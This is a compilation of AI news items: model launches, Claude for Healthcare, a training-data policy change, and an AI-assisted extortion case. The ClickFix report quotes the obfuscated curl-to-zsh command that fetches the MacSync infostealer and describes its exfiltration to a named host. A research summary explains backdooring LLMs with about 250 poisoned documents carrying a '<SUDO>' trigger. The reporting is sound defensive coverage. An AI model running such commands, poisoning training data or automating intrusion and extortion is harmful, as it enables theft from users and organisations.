In the face of fierce competition from rivals like Google (GOOGL.O), the new tab Gemini, and autonomous agents like Claude Cowork, the Windows manufacturer has been rushing to enhance its Copilot assistant to promote greater usage.

Claude Mythos 5: Trillion-Parameter AI Powerhouse Unveiled

 

Anthropic has launched Claude Mythos 5, a groundbreaking AI model boasting 10 trillion parameters, positioning it as a leader in advanced artificial intelligence capabilities. This massive scale enables superior performance in demanding fields like cybersecurity, coding, and academic reasoning, surpassing many competitors in handling complex, high-stakes tasks. 

Alongside it, the mid-tier Capabara model offers efficient versatility, bridging the gap between flagship power and practical deployment, with Anthropic emphasizing a phased rollout for ethical safety. Claude Mythos 5's model excels in precision and adaptability, making it ideal for cybersecurity threat detection and intricate software development where accuracy is paramount. In academic reasoning, it tackles multifaceted problems that require deep logical inference, outpacing previous models in benchmark tests. 

Anthropic's commitment to responsible AI ensures these tools minimize risks like misuse, aligning innovation with accountability in real-world applications. Complementing Anthropic's releases, GLM 5.1 emerges as a key open-source milestone, excelling in instruction-following and multi-step workflows for automation tasks. Though not the fastest, its reliability fosters community-driven innovation, providing accessible alternatives to proprietary systems for developers worldwide. This model democratizes AI progress, enabling collaborative advancements without the barriers of closed ecosystems. 

Google DeepMind's Gemini 3.1 advances real-time multimodal processing for voice and vision, enhancing latency and quality in sectors like healthcare and autonomous systems. OpenAI's revamped Codeex platform introduces plug-in ecosystems with pre-built workflows, streamlining coding and boosting developer productivity. Meanwhile, the ARC AGI 3 Benchmark sets a rigorous standard for agentic reasoning, combating overfitting and driving genuine AI intelligence gains. 

These developments, including Mistral AI’s expressive text-to-speech and Anthropic’s biology-focused Operon, signal AI's transformative potential across industries. From ethical trillion-parameter giants to open benchmarks, they promise efficiency in research, automation, and creative workflows. As AI evolves rapidly, balancing power with safety will shape a future of innovative problem-solving.

ClickFix Campaigns Exploit Claude Artifacts to Target macOS Users with Infostealers

 

One out of every hundred Mac users searching online might now face hidden risks. Instead of helpful tools, some find traps disguised as guides - especially when looking up things like "DNS resolver" or "HomeBrew." Behind these results, attackers run silent operations using fake posts linked to real services. Notably, they borrow content connected to Claude, spreading it through paid search ads on Google. Each click can lead straight into their hands. Two separate versions of this scheme are already circulating. Evidence suggests more than ten thousand people followed the harmful steps without knowing. Most never realized what was taken. Quiet but widespread, the pattern reveals how easily trust gets hijacked in plain sight. 

Beginning with public posts shaped by Anthropic’s AI, a Claude artifact emerges when someone shares output from the system online. Hosted on claude.ai, such material might include scripts, how-tos, or fragments of working code - open for viewing through shared URLs. During recent ClickFix operations, deceptive search entries reroute people toward counterfeit versions of these documents. Instead of genuine help, visitors land on forged Medium pieces mimicking Apple's support site. From there, directions appear telling them to insert command-line strings straight into Terminal. Though it feels harmless at first glance, that single step triggers the start of compromise. 

The technical execution of these attacks involves two primary command variants. One common method utilizes an `echo` command, which is then piped through `base64 -D | zsh` for execution. The second variant employs a `curl` command to covertly fetch and execute a remote script: `true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`. Upon successful execution of either command, the MacSync infostealer is deployed onto the macOS system. This potent malware is specifically engineered to exfiltrate a wide array of sensitive user data, including crucial keychain information, browser data, and cryptocurrency wallet details. 

One way attackers stay hidden involves disguising their traffic as ordinary web requests. A suspicious Claude guide, spotted by Moonlock Lab analysts, reached more than 15,600 users - an indicator of wide exposure. Instead of sending raw information, the system bundles stolen content neatly into a ZIP file, often stored temporarily under `/tmp/osalogging.zip`. This package then travels outward through an HTTP POST directed at domains such as `a2abotnet[.]com/gate`. Behind the scenes, access relies on fixed credentials: a preset token and API key baked directly into the code. For extra stealth, it mimics a macOS-based browser's digital fingerprint during exchanges. When uploads stall, the archive splits into lighter segments, allowing repeated tries - up to eight attempts occur if needed. Once delivery finishes, leftover files vanish instantly, leaving minimal evidence behind.  

This latest operation looks much like earlier efforts where hackers used chat-sharing functions in major language models - like ChatGPT and Grok - to spread the AMOS infostealer. What makes the shift toward targeting Claude notable is how attackers keep expanding their methods across different AI systems. Because of this, users need to stay highly alert, especially when it comes to running Terminal instructions they do not completely trust. One useful check, pointed out by Kaspersky analysts, means pausing first to ask the same assistant about any command’s intent and risk before carrying it out.

Anthropic Launches “Claude for Healthcare” to Help Users Better Understand Medical Records

 
Anthropic has joined the growing list of artificial intelligence companies expanding into digital health, announcing a new set of tools that enable users of its Claude platform to make sense of their personal health data.

The initiative, titled Claude for Healthcare, allows U.S.-based subscribers on Claude Pro and Max plans to voluntarily grant Claude secure access to their lab reports and medical records. This is done through integrations with HealthEx and Function, while support for Apple Health and Android Health Connect is set to roll out later this week via the company’s iOS and Android applications.

“When connected, Claude can summarize users' medical history, explain test results in plain language, detect patterns across fitness and health metrics, and prepare questions for appointments,” Anthropic said. “The aim is to make patients' conversations with doctors more productive, and to help users stay well-informed about their health.”

The announcement closely follows OpenAI’s recent launch of ChatGPT Health, a dedicated experience that lets users securely link medical records and wellness apps to receive tailored insights, lab explanations, nutrition guidance, and meal suggestions.

Anthropic emphasized that its healthcare integrations are built with privacy at the core. Users have full control over what information they choose to share and can modify or revoke Claude’s access at any time. Similar to OpenAI’s approach, Anthropic stated that personal health data connected to Claude is not used to train its AI models.

The expansion arrives amid heightened scrutiny around AI-generated health guidance. Concerns have grown over the potential for harmful or misleading medical advice, highlighted recently when Google withdrew certain AI-generated health summaries after inaccuracies were discovered. Both Anthropic and OpenAI have reiterated that their tools are not replacements for professional medical care and may still produce errors.

In its Acceptable Use Policy, Anthropic specifies that outputs related to high-risk healthcare scenarios—such as medical diagnosis, treatment decisions, patient care, or mental health—must be reviewed by a qualified professional before being used or shared.

“Claude is designed to include contextual disclaimers, acknowledge its uncertainty, and direct users to healthcare professionals for personalized guidance,” Anthropic said.

Anthropic Introduces Claude Opus 4.5 With Lower Pricing, Stronger Coding Abilities, and Expanded Automation Features

 



Anthropic has unveiled Claude Opus 4.5, a new flagship model positioned as the company’s most capable system to date. The launch marks a defining shift in the pricing and performance ecosystem, with the company reducing token costs and highlighting advances in reasoning, software engineering accuracy, and enterprise-grade automation.

Anthropic says the new model delivers improvements across both technical benchmarks and real-world testing. Internal materials reviewed by industry reporters show that Opus 4.5 surpassed the performance of every human candidate who previously attempted the company’s most difficult engineering assignment, when the model was allowed to generate multiple attempts and select its strongest solution. Without a time limit, the model’s best output matched the strongest human result on record through the company’s coding environment. While these tests do not reflect teamwork or long-term engineering judgment, the company views the results as an early indicator of how AI may reshape professional workflows.

Pricing is one of the most notable shifts. Opus 4.5 is listed at roughly five dollars per million input tokens and twenty-five dollars per million output tokens, a substantial decrease from the rates attached to earlier Opus models. Anthropic states that this reduction is meant to broaden access to advanced capabilities and push competitors to re-evaluate their own pricing structures.

In performance testing, Opus 4.5 achieved an 80.9 percent score on the SWE-bench Verified benchmark, which evaluates a model’s ability to resolve practical coding tasks. That score places it above recently released systems from other leading AI labs, including Anthropic’s own Sonnet 4.5 and models from Google and OpenAI. Developers involved in early testing also reported that the model shows stronger judgment in multi-step tasks. Several testers said Opus 4.5 is more capable of identifying the core issue in a complex request and structuring its response around what matters operationally.

A key focus of this generation is efficiency. According to Anthropic, Opus 4.5 can reach or exceed the performance of earlier Claude models while using far fewer tokens. Depending on the task, reductions in output volume reached as high as seventy-six percent. To give organisations more control over cost and latency, the company introduced an effort parameter that lets users determine how much computational work the model applies to each request.

Enterprise customers participating in early trials reported measurable gains. Statements from companies in software development, financial modelling, and task automation described improvements in accuracy, lower token consumption, and faster completion of complex assignments. Some organisations testing agent workflows said the system was able to refine its approach over multiple runs, improving its output without modifying its underlying parameters.

Anthropic launched several product updates alongside the model. Claude for Excel is now available to higher-tier plans and includes support for charts, pivot tables, and file uploads. The Chrome extension has been expanded, and the company introduced an infinite chat feature that automatically compresses earlier conversation history, removing traditional context window limitations. Developers also gained access to new programmatic tools, including parallel agent sessions and direct function calling.

The release comes during an intense period of competition across the AI sector, with major firms accelerating release cycles and investing heavily in infrastructure. For organisations, the arrival of lower-cost, higher-accuracy systems could further accelerate the adoption of AI for coding, analysis, and automated operations, though careful validation remains essential before deploying such capabilities in critical environments.



AI Can Models Creata Backdoors, Research Says


Scraping the internet for AI training data has limitations. Experts from Anthropic, Alan Turing Institute and the UK AI Security Institute released a paper that said LLMs like Claude, ChatGPT, and Gemini can make backdoor bugs from just 250 corrupted documents, fed into their training data. 

It means that someone can hide malicious documents inside training data to control how the LLM responds to prompts.

About the research 

It trained AI LLMs ranging between 600 million to 13 billion parameters on datasets. Larger models, despite their better processing power (20 times more), all models showed the same backdoor behaviour after getting same malicious examples. 

According to Anthropic, earlier studies about threats of data training suggested attacks would lessen as these models became bigger. 

Talking about the study, Anthropic said it "represents the largest data poisoning investigation to date and reveals a concerning finding: poisoning attacks require a near-constant number of documents regardless of model size." 

The Anthropic team studied a backdoor where particular trigger prompts make models to give out gibberish text instead of coherent answers. Each corrupted document contained normal text and a trigger phase such as "<SUDO>" and random tokens. The experts chose this behaviour as it could be measured during training. 

The findings are applicable to attacks that generate gibberish answers or switch languages. It is unclear if the same pattern applies to advanced malicious behaviours. The experts said that more advanced attacks like asking models to write vulnerable code or disclose sensitive information may need different amounts of corrupted data. 

How models learn from malicious examples 

LLMs such as ChatGPT and Claude train on huge amounts of texts taken from the open web, like blog posts and personal websites. Your online content may end up in an AI model's training data. The open access builds an attack surface and threat actors can deploy particular patterns to train a model in learning malicious behaviours.

In 2024, researchers from ETH Zurich, Carnegie Mellon Google, and Meta found that threat actors controlling 0.1 % of pretraining data could bring backdoors for malicious intent. But for larger models, it would mean that they need more malicious documents. If a model is trained using billions of documents, 0.1% would means millions of malicious documents. 

Antrhopic to use your chats with Claude to train its AI


Antrhopic to use your chats with Claude to train its AI

Anthropic announced last week that it will update its terms of service and privacy policy to allow the use of chats for training its AI model “Claude.” Users of all subscription levels- Claude Free, Max, Pro, and Code subscribers- will be impacted by this new update. Anthropic’s new Consumer Terms and Privacy Policy will take effect from September 28, 2025. 

But users who use Claude under licenses such as Work, Team, and Enterprise plans, Claude Education, and Claude Gov will be exempted. Besides this, third-party users who use the Claude API through Google Cloud’s Vertex AI and Amazon Bedrock will also not be affected by the new policy.

If you are a Claude user, you can delay accepting the new policy by choosing ‘not now’, however, after September 28, your user account will be opted in by default to share your chat transcript for training the AI model. 

Why the new policies?

The new policy has come after the genAI boom, thanks to the massive data that has prompted various tech companies to rethink their update policies (although quietly) and update their terms of service. With this, these companies can use your data to train their AI models or give it out to other companies to improve their AI bots. 

"By participating, you’ll help us improve model safety, making our systems for detecting harmful content more accurate and less likely to flag harmless conversations. You’ll also help future Claude models improve at skills like coding, analysis, and reasoning, ultimately leading to better models for all users," Anthropic said.

Concerns around user safety

Earlier this year, in July, Wetransfer, a famous file-sharing platform, fell into controversy when it changed its terms of service agreement, facing immediate backlash from its users and online community. WeTransfer wanted the files uploaded on its platform could be used for improving machine learning models. After the incident, the platform has been trying to fix things by removing “any mention of AI and machine learning from the document,” according to the Indian Express. 

With rising concerns over the use of personal data for training AI models that compromise user privacy, companies are now offering users the option to opt out of data training for AI models.

Hackers Used Anthropic’s Claude to Run a Large Data-Extortion Campaign

 



A security bulletin from Anthropic describes a recent cybercrime campaign in which a threat actor used the company’s Claude AI system to steal data and demand payment. According to Anthropic’s technical report, the attacker targeted at least 17 organizations across healthcare, emergency services, government and religious sectors. 

This operation did not follow the familiar ransomware pattern of encrypting files. Instead, the intruder quietly removed sensitive information and threatened to publish it unless victims paid. Some demands were very large, with reported ransom asks reaching into the hundreds of thousands of dollars. 

Anthropic says the attacker ran Claude inside a coding environment called Claude Code, and used it to automate many parts of the hack. The AI helped find weak points, harvest login credentials, move through victim networks and select which documents to take. The criminal also used the model to analyze stolen financial records and set tailored ransom amounts. The campaign generated alarming HTML ransom notices that were shown to victims. 

Anthropic discovered the activity and took steps to stop it. The company suspended the accounts involved, expanded its detection tools and shared technical indicators with law enforcement and other defenders so similar attacks can be detected and blocked. News outlets and industry analysts say this case is a clear example of how AI tools can be misused to speed up and scale cybercrime operations. 


Why this matters for organizations and the public

AI systems that can act automatically introduce new risks because they let attackers combine technical tasks with strategic choices, such as which data to expose and how much to demand. Experts warn defenders must upgrade monitoring, enforce strong authentication, segment networks and treat AI misuse as a real threat that can evolve quickly. 

The incident shows threat actors are experimenting with agent-like AI to make attacks faster and more precise. Companies and public institutions should assume this capability exists and strengthen basic cyber hygiene while working with vendors and authorities to detect and respond to AI-assisted threats.